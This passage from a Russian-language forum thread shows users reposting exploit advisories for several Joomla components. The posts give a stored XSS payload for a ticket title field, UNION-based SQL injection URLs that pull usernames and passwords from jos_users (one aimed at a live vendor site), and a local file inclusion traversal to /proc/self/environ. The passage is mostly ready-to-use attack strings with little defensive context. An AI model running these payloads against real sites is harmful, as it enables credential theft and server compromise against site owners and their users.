    It is possible to inject arbitrary HTML and JS/VBS code into the title field of the
    ticket. If someone else views the ticket list, the code gets executed in the
    visitor's browser.
    
    This vulnerability is considered as critical since the tickets are also displayed
    in the administrator backend of Joomla. As soon as a user with extended priviledges
    views the ticket list in the backend, the code gets executed and damage can be caused.
    
    Example code for the ticket title field:
    "><IMG """><SCRIPT>alert("XSS")</SCRIPT>
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
    >> Additional Information
    Advisory/Exploit Published = 12.11.2010
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
    >> Misc
    Greetz = cr4wl3r, JosS, packetstormsecurity.org, exploit-db.com
    
    
    [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]
     
    14 ноя 2010
    1 человеку нравится это.
  17. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    241
    Joomla Alfurqan15x SQL Injection

    Код:
    #############################################################################################################
    ## Joomla Component com_alfurqan15x SQL injection                                               ##
    ## Author : kaMtiEz (kamtiez@indonesiancoder.com)                                   ##
    ## Homepage : http://www.indonesiancoder.com                                            ##
    ## Date : 16 Nov, 2010                                                                    ##
    #############################################################################################################
    
    [ Software Information ]
    
    [+] Vendor : http://islamis4u.co.cc/
    [+] Download : http://islamis4u.co.cc/index.php?option=com_rokdownloads&view=folder&Itemid=198&id=4%3Aal-furqan-1-5
    [+] version : 2.2 or lower maybe also affected
    [+] Tested On : LocalHost
    [+] Vulnerability : SQL
    [+] Dork : "CiHuY"
    [+] LOCATION : INDONESIA - JOGJA
    
    #############################################################################################################
    
    [ Vulnerable File ]
    
    http://127.0.0.1/[kaMtiEz]/index.php?option=com_alfurqan15x&action=viewayat&surano=[BunciteRs]
    
    [ DEMO ]
    
    http://islamis4u.co.cc/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--
    
    [ FIX ]
    
    dunno :">
    
    
    #############################################################################################################
    
    [ Thx TO ]
    
    
     
    16 ноя 2010
  18. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    241
    Joomla Component (com_jimtawl) Local File Inclusion Vulnerability

    Код:
    -----------------------------------------------------------------------
         Joomla Component (com_jimtawl) LFI Vulnerability
    -----------------------------------------------------------------------
     
    Author      : Mask_magicianz
    Date        : November, 20/2010
    Location    : Medan, Indonesia
    Time Zone   : GMT +7:00
    Application : Package Jimtawl
    Dork         : com_jimtawl
    Contact     : Mask_magicianz[at]yahoo[dot]com
    http://extensions.joomla.org/extensions/multimedia/streaming-a-broadcasting/audio-broadcasting/4344
    _______________________________________________________________________
     
    http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=[LFI]
    http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00
     
     
    _______________________________________________________________________
     
    Thanks to : All RosebanditZ Team & All IndonesiaCoder
     
    20 ноя 2010
  19. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Joomla Component Time Returns (com_timereturns) SQL Injection


    Код:
    #############################################################################################################
    ## Joomla Component Time Returns (com_timereturns) SQL Injection Vulnerability	 ##
    ## Author : kaMtiEz (kamtiez@exploit-id.com)	 ##
    ## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id	 ##
    ## Date : 8 October, 2011 ##
    #############################################################################################################
    [ Software Information ]


    #############################################################################################################

    [ Vulnerable File ]

    Код:
    http://127.0.0.1/[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=[num]
    [ XpL ]

    Код:
    http://127.0.0.1/[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
     
    11 окт 2011
  20. Fooog
    Fooog Новичок
    Симпатии:
    1
    QContacts 1.0.6 (Joomla component) SQL injection

    Vulnerability:
    This vulnerability affects /index.php


    Код:
    /index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
     
    11 дек 2011
    1 человеку нравится это.

Поделиться этой страницей

Загрузка...